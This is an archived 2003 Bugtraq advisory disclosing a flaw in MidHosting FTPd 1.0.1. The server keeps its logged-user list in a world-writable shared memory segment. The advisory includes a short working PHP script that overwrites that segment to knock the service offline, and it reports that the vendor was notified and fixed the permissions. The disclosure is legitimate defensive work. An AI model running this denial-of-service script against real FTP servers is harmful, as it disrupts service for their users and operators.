lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030618081835.GA19719@c9x.org>
Date: Wed, 18 Jun 2003 10:18:13 +0200
From: Frank Denis <j@...networks.com>
To: bugtraq@...urityfocus.com
Subject: MHFTPD vulnerability



Product : MidHosting FTPd
Date    : 06/18/2003
Author  : Frank Denis <j@...networks.com>



   ------------------------[ Product description ]------------------------

MidHosting FTPd is an FTP server designed for hosting servers, based upon
virtual ftpd with support for chroot, virtual users and other standard FTP
features.

Home page : http://freeware.tversu.ru/mhftpd/


      ------------------------[ Vulnerability ]------------------------
     
mhftpd can keep track of logged users in order to disable multiple
concurrent logins. The -m command-line switch enables this option.

Unfortunately, when this option is enabled, any user with shell access, CGI
access, PHP access, etc. can bypass this restriction or cause a permanent
denial of service.


	 ------------------------[ Details ]------------------------

The list of currently logged users is kept in a public SysV shared memory
segment.

However this segment and the related locking semaphore are world readable
and world writable.

Non null-terminated user names will immediately cause a denial of service.


	 ------------------------[ Exploit ]------------------------

Here's a trivial PHP script that triggers the flaw and makes the service
unavailable.

<?php
# mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
    die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>


    ------------------------[ Affected versions ]------------------------
     
  This issue has been verified on version 1.0.1 of MidHosting FTPd.
  

 ------------------------[ Vendor status and fixes ]------------------------
     
  MidHosting FTPd author Ivan Stepnikov <iv@...rsu.ru> has been notified on
06/17/2003 and promptly fixed the permissions on the shared memory segment.

  The fixed version is available for download from the main web site.
  
  However it looks like the version number hasn't been bumped. In order to
check whether your software is vulnerable or not, please compute the MD5
digest of the tarball. The digest of the fixed one is
9b0bb31948ebbb11e9d2ef74276310df.



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ